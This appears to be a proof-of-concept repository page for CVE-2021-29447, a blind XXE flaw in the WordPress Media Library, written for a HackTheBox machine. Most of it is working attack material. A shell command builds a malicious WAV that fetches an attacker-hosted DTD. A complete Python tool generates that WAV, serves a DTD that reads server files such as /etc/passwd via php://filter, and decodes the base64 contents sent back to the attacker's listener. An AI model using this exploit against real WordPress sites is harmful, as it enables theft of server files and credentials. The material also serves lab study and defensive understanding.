POC details: 55961006fa1b807515c472030622ca234b2753ce

Source
Related vulnerability
Title: WordPress code issue vulnerability (CVE-2021-29447)
Description: WordPress is a blog platform developed in PHP by the WordPress Foundation. It lets users host a personal blog on a server running PHP and MySQL. WordPress contains a code issue vulnerability: in a successful XXE attack, an attacker can use it to read internal files.
Description
Arbitrary file read controller based on CVE-2021-29447
Introduction
## Blind XXE controller

I wrote this controller while working on the metatwo machine on HackTheBox to exploit CVE-2021-29447, an XXE vulnerability in the WordPress Media Library affecting versions 5.7, 5.6.2, 5.6.1, 5.6 and 5.0.11 (fixed in 5.7.1; the bug is only reachable when WordPress runs on PHP 8). An authenticated user who is allowed to upload to the media library can upload a malicious WAV file, which leads to arbitrary remote file read and server-side request forgery (SSRF).

Exploiting the bug takes several steps. The parsed iXML metadata is never sent back to the user, so a blind XXE payload is needed: the DOCTYPE inside the WAV pulls in an external Document Type Definition (DTD) hosted on the attacker's server, and that DTD reads the target file and declares a further entity whose SYSTEM URI points back at the attacker's listener with the file's contents (base64-encoded so they survive as an entity value; the Sonar write-up does this with a `php://filter` wrapper) as a query parameter. Once the malicious WAV is built and uploaded, the listener receives an HTTP request carrying the base64-encoded contents of the chosen file, e.g. /etc/passwd, and decodes it. This controller covers all of these steps; you only need to type the filename at the controller's **$console >** prompt.

Detailed blog [https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/](https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/)


Note: this controller is configured specifically for the HTB metatwo machine. To use it anywhere else you will need to adjust the scripts.

### Usage

Create a WAV file named **payload.wav** (replace `YOUR_IP` with the address of your listener):

```bash
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOUR_IP:8000/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
```

Run **main.py**, passing the IP the listener should bind to:

```bash
python3 main.py listen_ip
```
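The steps described above (the attacker-hosted DTD, the WAV carrier, and the listener that decodes the callback) as one worked example. This is an added example written for this page, not the controller.py/listener.py/main.py from the repository. It computes the RIFF and iXML chunk sizes from the payload instead of hard-coding them, so any listener address works without re-counting bytes; the listener address, port, DTD name and the sample request line are assumptions or constructed data.

```python
"""Blind XXE helper for CVE-2021-29447 (added example, not the repository's code).

Assumptions: the attacker serves evil.dtd on `port`, the victim's XML parser
fetches it, and the exfiltrated data comes back as GET /?p=<base64>.
"""
import base64
import struct
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlparse


def build_dtd(listen_ip: str, port: int, target: str) -> str:
    """External DTD the victim fetches. %file reads `target` through php://filter
    so the contents come back as base64 (no bytes that would break the XML);
    %init declares %trick, whose SYSTEM URI carries that base64 to the listener."""
    filt = f"php://filter/read=convert.base64-encode/resource={target}"
    return (
        f'<!ENTITY % file SYSTEM "{filt}">\n'
        f'<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM '
        f"'http://{listen_ip}:{port}/?p=%file;'>\">\n"
    )


def build_wav(listen_ip: str, port: int, dtd_name: str = "evil.dtd") -> bytes:
    """WAV carrier: RIFF header, WAVE form type, then an iXML chunk whose data is
    the DOCTYPE that pulls in the remote DTD. Sizes are computed, not hard-coded."""
    xml = (
        '<?xml version="1.0"?>'
        f"<!DOCTYPE ANY[<!ENTITY % remote SYSTEM 'http://{listen_ip}:{port}/{dtd_name}'>"
        "%remote;%init;%trick;]>"
    ).encode()
    data = xml + b"\x00"  # trailing NUL, as in the public payload
    chunk = b"iXML" + struct.pack("<I", len(data)) + data
    body = b"WAVE" + chunk
    return b"RIFF" + struct.pack("<I", len(body)) + body


def ixml_payload(wav: bytes) -> str:
    """Walk the RIFF chunks the way a metadata parser does and return the iXML
    text, i.e. what the vulnerable library hands to the XML parser."""
    if wav[:4] != b"RIFF" or wav[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    pos = 12
    while pos + 8 <= len(wav):
        cid = wav[pos:pos + 4]
        size = struct.unpack("<I", wav[pos + 4:pos + 8])[0]
        if cid == b"iXML":
            return wav[pos + 8:pos + 8 + size].rstrip(b"\x00").decode()
        pos += 8 + size + (size & 1)  # RIFF chunks are word-aligned
    raise ValueError("no iXML chunk")


def decode_exfil(request_line: str) -> bytes:
    """Recover the file from the callback's request line, e.g.
    'GET /?p=cm9vdDp4... HTTP/1.1'. The value is taken raw on purpose:
    parse_qs would turn '+' into a space and corrupt the base64."""
    _method, path, _version = request_line.split(" ", 2)
    for kv in urlparse(path).query.split("&"):
        key, _, value = kv.partition("=")
        if key == "p":
            return base64.b64decode(unquote(value))
    raise ValueError("no p= parameter in callback")


class ExfilHandler(BaseHTTPRequestHandler):
    """Serves evil.dtd to the victim, then decodes whatever comes back."""
    listen_ip = "127.0.0.1"  # assumption: address the victim can reach
    port = 8000
    target = "/etc/passwd"
    received = []  # decoded file contents, in arrival order

    def do_GET(self):
        if self.path == "/evil.dtd":
            body = build_dtd(self.listen_ip, self.port, self.target).encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            return
        try:
            self.received.append(decode_exfil(self.requestline))
        except ValueError:
            pass
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()


# Constructed sample data (not captured from a real target).
SAMPLE_FILE = b"root:x:0:0:root:/root:/bin/bash\n"
SAMPLE_REQUEST_LINE = "GET /?p=" + base64.b64encode(SAMPLE_FILE).decode() + " HTTP/1.1"

if __name__ == "__main__":
    if len(sys.argv) > 1:
        ExfilHandler.listen_ip = sys.argv[1]
    with open("payload.wav", "wb") as f:
        f.write(build_wav(ExfilHandler.listen_ip, ExfilHandler.port))
    print(f"wrote payload.wav; serving evil.dtd on port {ExfilHandler.port}")
    HTTPServer(("0.0.0.0", ExfilHandler.port), ExfilHandler).serve_forever()
```

Run it as `python3 xxe_helper.py LISTEN_IP` (file name assumed): it writes payload.wav for that address, serves the DTD, and stores each decoded callback in `ExfilHandler.received`. The `ixml_payload` walker is there so you can check the carrier parses before uploading it.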

#### POC image

![/poc/poc.png](/poc/poc.png)
File snapshot

[4.0K] /data/pocs/55961006fa1b807515c472030622ca234b2753ce
├── [1.7K] controller.py
├── [1.1K] listener.py
├── [ 668] main.py
├── [4.0K] poc
│   └── [193K] poc.png
└── [1.7K] README.md

1 directory, 5 files